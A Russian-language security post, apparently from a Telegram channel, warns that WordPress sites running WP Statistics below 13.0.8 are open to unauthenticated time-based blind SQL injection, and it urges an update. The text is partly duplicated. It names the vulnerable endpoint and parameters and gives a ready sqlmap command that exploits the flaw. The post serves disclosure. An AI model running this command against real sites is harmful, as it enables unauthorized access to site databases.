💉 Более 600 000 сайтов на Wordpress уязвимы к SQL-инъекции
WP Statistics - это плагин WordPress, который позволяет владельцам сайтов видеть подробную статистику о посетителях своего сайта, в том числе о том, какие страницы на сайте они посещают.
Не забудьте немедленно обновить плагин. Сайты, на которых установлен данный плагин с версией <13.0.8, уязвимы к time-based blind SQL-инъекции без аутентификации, что позволяет злоумышленникам получить доступ к конфиденциальным данным, хранящимся в базе данных сайта.
Отправляем запрос на
#web #sqli
WP Statistics - это плагин WordPress, который позволяет владельцам сайтов видеть подробную статистику о посетителях своего сайта, в том числе о том, какие страницы на сайте они посещают.
Не забудьте немедленно обновить плагин. Сайты, на которых установлен данный плагин с версией <13.0.8, уязвимы к time-based blind SQL-инъекции без аутентификации, что позволяет злоумышленникам получить доступ к конфиденциальным данным, хранящимся в базе данных сайта.
Отправляем запрос на
wp-admin/admin.php с параметром page=wps_pages_page. Затем необходимо предоставить вредоносные значения для параметров ID или type (можно через sqlmap)sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --technique=T --dbms="mysql" -p "ID" -b#web #sqli